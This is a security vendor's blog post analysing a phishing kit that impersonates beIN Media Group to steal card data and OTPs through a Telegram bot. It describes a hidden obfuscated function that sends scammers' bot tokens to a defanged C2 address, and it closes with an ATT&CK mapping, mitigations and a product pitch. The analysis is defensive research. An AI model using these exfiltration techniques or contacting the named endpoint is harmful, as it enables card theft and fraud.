At Bolster Research Labs, we recently observed that phishing kit creators constantly target entertainment media groups with a worldwide user base, like Disney+. (Our phishing kit has already dissected the specific behaviors of a phishing kit targeting Disney+.)
In our continuous pursuit of understanding the scope of these concerns, we turn our attention to another media heavyweight: beIN Media Group.
BeIN, a well-known Qatari state-owned company specializing in worldwide sports and entertainment, headquartered in Doha, Qatar, has become the latest victim of such phishing attempts. Our findings hint at a similar phishing kit intended to target beIN’s consumer base.
Surprisingly, this phishing kit is freely available within the underbelly of a cybercrime channel, but broad exploitation has yet to be accomplished. It raises the question of the kit’s hidden motivations and deliberate deployment timing. The deceptive method devised by the phishing kit’s developer serves as the focal point of our examination.
Not only are beIN Media Group’s naive clients at risk but so are the fraudsters. The developer has integrated a clever trap in the kit, a snare designed to steal the Telegram Bot token from scammers who use it in illegal activities.
This devious strategy is a game changer, showing a multifaceted threat landscape in which trust is a liability and even cybercriminals are vulnerable to predation. It serves as a harsh reminder that predators can rapidly become prey in the digital arena.
The focal point of this blog is to unveil the cunning tactic employed by the developer of the phishing kit that steals the Telegram Bot token from scammers who are reusing this phishing kit to scam customers of beIN Media Group.
Phishing Kit Structure
This phishing kit is designed to steal credit and debit card information from the beIN users and then exfiltrate it with the Telegram bot, a common technique observed for most phishing campaigns.
This phishing kit is not as sophisticated as others, primarily because it could be under development. The anti1.php, an antibot code (based on previous phishing kit analysis), contains the logic for unnecessary traffic like crawl engines, which seems incomplete. Since this can’t block traffic by default, AI engines can crawl and classify the hosted phishing site.
Data exfiltration
This phishing kit is designed to exfiltrate the credit/debit card information and OTP via the Telegram bot.
Both messages posted on Telegram contain sensitive information typically associated with credit card details, a transaction or account verification confirmation code, and expiration dates. The attacker later sells this data on Telegram or other dark web forums.
Phishing Kit Creator Stealing Telegram Bot Token
While testing this phishing kit’s capabilities locally, it was found that the phishing kit is stealing the Telegram bot token (used by scammers who host this phishing kit in the real world) and exfiltrating via this unknown endpoint: hxxp://102.165.14.4:5000/receive_token?referrer=loco as a POST request (while writing this blog, the endpoint is active).
We uncovered that the Telegram token exfiltration is triggered by one obfuscated function from a JQ.js file in the phishing kit.
Further scanning the IP address, we found 5 TCP ports open: 135,139,3389,500,5985, and likely the threat actor behind the phishing kit creation using IP management infrastructure powered by the IPXO (based on the WHOIS record).
The IP address mentioned above is working as a C&C server to exfiltrate tokens, and on port 5000, Werkzeug/2.3.7 Python/3.11.4 services are running.
MITRE ATT&CK
Understanding the tactics and techniques is critical for creating strong security measures and preventing potential threats. The Mitre TTP is given below:
| ID | Tactic | Technique | Procedure |
|---|---|---|---|
|
T1598 |
Reconnaissance |
Phishing for Information |
Spearphishing to target beIN Media Group to get Personal Identifiable Information [PII] and credentials. |
|
T1566 |
Initial Access |
Phishing |
Spearphishing to target beIN Media Group. |
|
T1204 |
Execution |
User Interface |
Adversaries rely upon the user/customers to input the credentials and PII through login portal. |
|
T1505 |
Persistence |
Server Software Component |
Through the phishing kit’s backdoor, the scammer’s operations can be continuously accessed by its creator. |
|
T1656 |
Defense Evasion |
Impersonation |
Impersonating beIN Media Group in order to persuade and trick the customers and users. |
|
T1056 |
Credentials Access |
Input Capture |
Adversaries using methods to capture user input to obtain credentials and credit card details through login portal in this case. |
|
T1087 |
Discovery |
Account Discovery |
Adversaries collecting information from compromised user. |
|
T1056 |
Collection |
Input Capture |
Adversaries using methods to capture user input to obtain credentials and credit card details through login portal in this case. |
|
T1102 |
Command & Control |
Web Service |
Telegram and 102.165.14.4 acting as a mechanism for C2 as a means for relaying data to/from a compromised system/user. |
|
T1041 |
Exfiltration |
Exfiltration Over C2 Channel |
Adversaries are exfiltrating data over C2 server. In this case, telegram bot and 102.165.14.4 is serving as C2 server to exfiltrate tokens. |
Impact & mitigation
| Impact | Mitigation |
|---|---|
|
The collected data contains Personal Identifiable Information (PII) of the users interacting with the kit, which could later be sold on dark web forums, thus resulting to data breach. |
Regularly performing vulnerability assessments, conducting penetration testing to identify gaps in security protocols, and keeping up-to-date with the latest phishing trends and techniques are essential for maintaining a secure IT environment. |
|
Loss of trust and reputation, financial loss. |
Cybersecurity incorporated into employee onboarding, thus creating awareness among the individuals at an early stage. |
Conclusion
In conclusion, our investigation into the phishing kit targeting beIN Media Group reveals a fascinating and ironic twist in cybercrime. The creators of this phishing kit distributed it freely on cybercrime channels and stole Telegram bot tokens from the scammers who would host it. Those stolen tokens can be abused for various malicious purposes.
Furthermore, our analysis at Bolster Research Labs sheds light on the operation of this specific phishing kit. It contributes to a broader understanding of cybercriminal tactics and the need for continuous innovation in cybersecurity defenses. Sharing our findings becomes crucial in the collective fight against cybercrime as we continue to uncover and dissect these threats.
Bolster’s anti-phishing and domain monitoring technology protects your business from evolving phishing threats. With the industry’s leading LLMs and continuous scanning technology that quickly identifies threats and misuse of your branded assets, you can trust Bolster will protect your business.
See Bolster in action when you request a demo.
